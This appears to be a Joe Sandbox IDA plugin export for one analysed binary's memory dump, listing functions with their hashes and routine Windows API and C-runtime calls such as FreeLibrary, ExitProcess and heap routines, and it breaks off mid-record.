Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: dcf7491ca214860e487e77938373b098f05fcf341780650e92e05a1f8534bf3b
Instruction ID: ba2c257b6bd74dd9a7249a214cce3d3c6a055986a4cb842d6934b87e46d0253d
Opcode Fuzzy Hash: dcf7491ca214860e487e77938373b098f05fcf341780650e92e05a1f8534bf3b
Instruction Fuzzy Hash: B9E08672B1410EA78F18ABF1DC459EF72ACEB01209700447BE503D2200EBB8E9C24669

Function 00419C38 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,00000000,00438820,0040FCBD), ref: 00419C49
FreeLibrary.KERNELBASE(?,00000000,00438820,0040FCBD), ref: 00419C53

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 0d62cf78e3bdc661a2f82cba813f0a1a4c9abef6bee34bc7d64aa9ac4bab2991
Instruction ID: c107808b105c149daf5e6932ca7134945d15cac4551d7c00fc89eb98d069ac6e
Opcode Fuzzy Hash: 0d62cf78e3bdc661a2f82cba813f0a1a4c9abef6bee34bc7d64aa9ac4bab2991
Instruction Fuzzy Hash: A9E0EC35701220DB8720AF6ADC1499AF3ECAF99B11316486AE845E3320D774EC428AA9

Function 00406066 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 0040607B
ShowWindow.USER32(00000000), ref: 00406082

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 4831fce4d73d936a96b8da5e650052ed61dc757b3f02978e41a04ced16bb9e28
Instruction ID: bb8df4f73c5df098251a309fe1c33c8504d4bfd4afe98da2c54c19901aad4cc9
Opcode Fuzzy Hash: 4831fce4d73d936a96b8da5e650052ed61dc757b3f02978e41a04ced16bb9e28
Instruction Fuzzy Hash: 9FC01232258201FFCB010BB0DC09D2ABFACABA4212F00CA68B8A5C0161C23AC020DB62

Function 00406048 Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00406056
KiUserCallbackDispatcher.NTDLL(00000000), ref: 0040605D

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: CallbackDispatcherItemUser
String ID:
API String ID: 4250310104-0
Opcode ID: 10473aa6b390d4c6f4367ea588a870e2b335c57c20f02c17b48037ae3329eebf
Instruction ID: 1aa957cd52260ed364119c24255e18d6411bf3cbccacf3a019d43f62ef9d5eea
Opcode Fuzzy Hash: 10473aa6b390d4c6f4367ea588a870e2b335c57c20f02c17b48037ae3329eebf
Instruction Fuzzy Hash: 4BC04C76508240FFCB115BA09D08C2FBFADAF98311F50C859B9A581121C636C421DB26

Function 004210A9 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 004210B1

Part of subcall function 0042107E: GetModuleHandleW.KERNEL32(mscoree.dll,?,004210B6,00000000,?,0041CB37,000000FF,0000001E,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018), ref: 00421088
Part of subcall function 0042107E: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00421098

ExitProcess.KERNEL32 ref: 004210BA

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 21a27a63abf6c3875c02e94f35324880841d9b00b93dc530bda6b4d16cfe0508
Instruction ID: f9bd48d237f3f7fcae67eaf8b1950dbb8cceb07f8c1f8ff35cc01fe5c684c7f2
Opcode Fuzzy Hash: 21a27a63abf6c3875c02e94f35324880841d9b00b93dc530bda6b4d16cfe0508
Instruction Fuzzy Hash: 72B09B311001487FDB112F52DC098593F15DB40360B504025F80409031DF719DE3D5C5

Function 00402C53 Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402C58

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bf4ac87ce319440de3cbdc02af3d6bb132a853ffd7ff8b76651f111219efe262
Instruction ID: f888913d286be945a1139a0333e0c343961bf1ba79595c6257e0af2005621159
Opcode Fuzzy Hash: bf4ac87ce319440de3cbdc02af3d6bb132a853ffd7ff8b76651f111219efe262
Instruction Fuzzy Hash: 63614770505744AADB25DB75C999BEBB7E4AF05314F00497FF0AB622C3CBB82984CB19

Function 00417715 Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041771A

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e8ed12af74225a54453d37c694eca28a6228af283361f86089a81442b0e0a612
Instruction ID: dc28d4d626c909ba28da4c541411ce0e300b2c69727a092553769846e0656262
Opcode Fuzzy Hash: e8ed12af74225a54453d37c694eca28a6228af283361f86089a81442b0e0a612
Instruction Fuzzy Hash: 8D31A273A042058BCB14EF69C9826EDB7F1EF95308F24446ED052E7392C739AD81CB28

Function 004090E7 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0040914E

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcsncpy
String ID:
API String ID: 1735881322-0
Opcode ID: 3c487f45cf325fdfc169150916cb0d5f0be5dcadb45b6341a8fcd8ea48b84124
Instruction ID: 7328be185230f80c8c1b4a96cbaadf37babfc1a7a15af7408875e64807603648
Opcode Fuzzy Hash: 3c487f45cf325fdfc169150916cb0d5f0be5dcadb45b6341a8fcd8ea48b84124
Instruction Fuzzy Hash: DF2126306402156AEB20AA65C849BEF73AD9F05744F044037F985EB2C3E3BC9DC48798

Function 00415195 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041519A

Part of subcall function 0041A086: __lock.LIBCMT ref: 0041A0A4
Part of subcall function 0041A086: ___sbh_find_block.LIBCMT ref: 0041A0AF
Part of subcall function 0041A086: ___sbh_free_block.LIBCMT ref: 0041A0BE
Part of subcall function 0041A086: RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041EB44,00000000,0042D8B8,0000000C,0041EB7E,00000000,0041A52B,?,00425008,00000004,0042DAA0,0000000C), ref: 0041A0EE
Part of subcall function 0041A086: GetLastError.KERNEL32(?,00425008,00000004,0042DAA0,0000000C,00420EFE,00000000,0041A53A,00000000,00000000,00000000,?,0041E526,00000001,00000214), ref: 0041A0FF

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ErrorFreeH_prologHeapLast___sbh_find_block___sbh_free_block__lock
String ID:
API String ID: 2675452811-0
Opcode ID: 508af54376101301fb54282053f5f476b4823b58c1624c4e938049cf541abb92
Instruction ID: cd261fae68c794ea5b57b316fd267b77e4886767f751fe688ac4ffe59fe991fa
Opcode Fuzzy Hash: 508af54376101301fb54282053f5f476b4823b58c1624c4e938049cf541abb92
Instruction Fuzzy Hash: F6119A70505B409AC324FF72DAA26EAF7B4AF24308F40491EF067525D2DF78BA45CA19

Function 00408B8B Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408B90

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7b3dd2e5fdecf46e5de386a29542ce9eb7512626bb47aa67f4f971a9a5e50e59
Instruction ID: c927707f8915652adcfde73a2cda552ab4301ed6ad44ab332505f1e9c900a899
Opcode Fuzzy Hash: 7b3dd2e5fdecf46e5de386a29542ce9eb7512626bb47aa67f4f971a9a5e50e59
Instruction Fuzzy Hash: E6F04F35B00614AFD714AF58C889FADB7B5EF48724F208599E912A73E1CB749D008A54

Function 004087CA Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,771B20B0,00000000,0040841F,?,?,?,?,004071EB,?,00000000,?,00000800,?,?,?), ref: 004087E5

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 7ecf72b9a802cc8559e0326d1f4c23dd1549747322943175324f52bf2c4fec62
Instruction ID: 5a9db48a7ee800e2f169eb175cbba7edb72ab6b59cafedc6e9c43babf6590764
Opcode Fuzzy Hash: 7ecf72b9a802cc8559e0326d1f4c23dd1549747322943175324f52bf2c4fec62
Instruction Fuzzy Hash: 6AF0E2715427104BDB3056698A483D333D88B15331F149B2FD4F2A33D2CB7C58484B69

Function 004054AF Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004054B4

Part of subcall function 00409DAE: __EH_prolog.LIBCMT ref: 00409DB3

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 98767e5e22dcf5679d0ae1ea0e9db1b8aa2809052c515532c422abeb7ca8b044
Instruction ID: 223ccfc1114ac4878ddad171de1f9205b92fae00e5399885b2b6ad6e8ea0d63d
Opcode Fuzzy Hash: 98767e5e22dcf5679d0ae1ea0e9db1b8aa2809052c515532c422abeb7ca8b044
Instruction Fuzzy Hash: 1601AF71911694DEE705F7A5C1257EDBBA4DF14308F00408FA496632C3CBF81B88CBA6

Function 00409444 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 00409E2C: _wcspbrk.LIBCMT ref: 00409E3D

FindClose.KERNELBASE(00000000,00000800,000000FF,?,?,?,?,004081A3,?,?,00000000,?,00000800), ref: 00409474

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: CloseFind_wcspbrk
String ID:
API String ID: 2190230203-0
Opcode ID: 65c18560fadcf7c0b12ab435d75e3f3e99c3a981f13e924850ff3214d817b1e9
Instruction ID: 32f9e3d0d340718320f944d82a866e19189bde616d291a643fecb61f20036053
Opcode Fuzzy Hash: 65c18560fadcf7c0b12ab435d75e3f3e99c3a981f13e924850ff3214d817b1e9
Instruction Fuzzy Hash: 02F0F635008380AACA615B74C804BCB7B945F55324F108A1EB1F8221E3C679145ADB6A

Function 00406E41 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00406E46

Part of subcall function 00415195: __EH_prolog.LIBCMT ref: 0041519A

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 56eb0443e2032b94d43a3735223f9f2ecb291693dbd055469d35a2ec73a7267f
Instruction ID: 4cf58e0045ef2d5aa05767268f41b5feae0d3bcf362e2958875cd51dc7c2c9e9
Opcode Fuzzy Hash: 56eb0443e2032b94d43a3735223f9f2ecb291693dbd055469d35a2ec73a7267f
Instruction Fuzzy Hash: 3CE02232901600EBC329AB28D4023FEF375EFC1728F00072FE022632C1DBB86D418658

Function 004094A8 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004094C9

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: d1c248c132d394c9c0078804562d49f71b4f7b3fce7792e7db05c9271be2713d
Instruction ID: e6df6b1557e2ba54ca6f24c8125e515e1d94db030c2dd2b6d90ccbe533dd751d
Opcode Fuzzy Hash: d1c248c132d394c9c0078804562d49f71b4f7b3fce7792e7db05c9271be2713d
Instruction Fuzzy Hash: 83E0CD7190935035E321511D9C04FA7B6D84B91734F19C42FF098A33C2D1BC5C418769

Function 0041E9B7 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041E9CC

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: bf1e3bf3518953ba1a1cfb351a5287f9267f10c5b3ddaf736794a120e8baedd1
Instruction ID: f0a1ddbc7de6a6961978f51a4be97290eeddf9fac4efb7790fcf905564f07201
Opcode Fuzzy Hash: bf1e3bf3518953ba1a1cfb351a5287f9267f10c5b3ddaf736794a120e8baedd1
Instruction Fuzzy Hash: 1DD05E7A6503495AEB105F716C09B763BDCE7843A5F144436B90DC6190F674C590C548

Function 004089E2 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00408A62,?,00408C38,?,00000000,00000800,?,00000000), ref: 004089EE

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 5e2d871cb3fe1c1969b66f3fe9a3872159f564dc7bdc06796f72dfcbfb14f326
Instruction ID: b64b8a54e65d8e7b74f8b503db865f06bf3f068ce8444fbd4636c0a2ed47c6d8
Opcode Fuzzy Hash: 5e2d871cb3fe1c1969b66f3fe9a3872159f564dc7bdc06796f72dfcbfb14f326
Instruction Fuzzy Hash: 53C0127165004052CE2055384A894AB364697433667684AB6F076D11D0CB3ACC42F915

Function 0040D204 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32 ref: 0040D221

Part of subcall function 0040CE09: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040CE1A
Part of subcall function 0040CE09: GetMessageW.USER32 ref: 0040CE2B
Part of subcall function 0040CE09: TranslateMessage.USER32(?), ref: 0040CE35
Part of subcall function 0040CE09: DispatchMessageW.USER32(?), ref: 0040CE3F

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Message$DispatchItemPeekSendTranslate
String ID:
API String ID: 4142818094-0
Opcode ID: 96d894961c4767c1e64a66d43eb6f3f9f031ba28b070713e1493db6d830df4c7
Instruction ID: 0d2ea25ad04ad0a5d18f138e9db18183f4d7f5a67fb936a8ecc2db4c4dad53f1
Opcode Fuzzy Hash: 96d894961c4767c1e64a66d43eb6f3f9f031ba28b070713e1493db6d830df4c7
Instruction Fuzzy Hash: C3C01231240300ABD7117B10DD47F1A3552BB84705F5081397740340F2C57548329A89

Function 004212C5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 004212D1

Part of subcall function 00421199: __lock.LIBCMT ref: 004211A7
Part of subcall function 00421199: __decode_pointer.LIBCMT ref: 004211DE
Part of subcall function 00421199: __decode_pointer.LIBCMT ref: 004211F3
Part of subcall function 00421199: __decode_pointer.LIBCMT ref: 0042121D
Part of subcall function 00421199: __decode_pointer.LIBCMT ref: 00421233
Part of subcall function 00421199: __decode_pointer.LIBCMT ref: 00421240
Part of subcall function 00421199: __initterm.LIBCMT ref: 0042126F
Part of subcall function 00421199: __initterm.LIBCMT ref: 0042127F

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 0312a6c3b2f7289cb8feed2c6a78f266c5bde82c565949ac2978f4db14a7e252
